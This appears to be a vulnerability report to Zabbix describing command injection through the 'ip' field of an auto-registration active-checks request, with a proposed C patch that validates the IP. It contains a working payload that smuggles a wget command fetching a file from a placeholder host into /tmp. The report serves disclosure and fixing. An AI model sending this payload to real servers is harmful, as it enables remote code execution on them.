I confirmed that you fixed on 3.0.9, 2.2.18 for ZBX-12075 and etc., but it is not enough because you do not care at the situation for active check with auto registration.

I send following command to Zabbix trapper.

{ "request":"active checks", "host":"foobar", "ip":";wget -O /tmp/s http://www.xxx.yyy.zzz/s;#" }

If Zabbix server allows auto registration, a host is registred. So, with default scripts command injection is possible.

For fixing upper, I attached the patch not to accept incorrect ip at the auto regstration on active checks.

— src/zabbix_server/trapper/active.c 2017-02-27 18:22:48.000000000 +0900
+++ src/zabbix_server/trapper/active.c.new 2017-05-30 11:15:19.623254495 +0900
@@ -56,6 +56,12 @@ static int get_hostid_by_host(const char

zabbix_log(LOG_LEVEL_DEBUG, "In %s() host:'%s'", __function_name, host);

+ if (FAIL == is_ip(ip))
+

{ + zbx_snprintf(error, MAX_STRING_LEN, "invalid IP address [%s]", ip); + goto out; + }

+
if (FAIL == zbx_check_hostname(host))
{
zbx_snprintf(error, MAX_STRING_LEN, "invalid host name [%s]", host);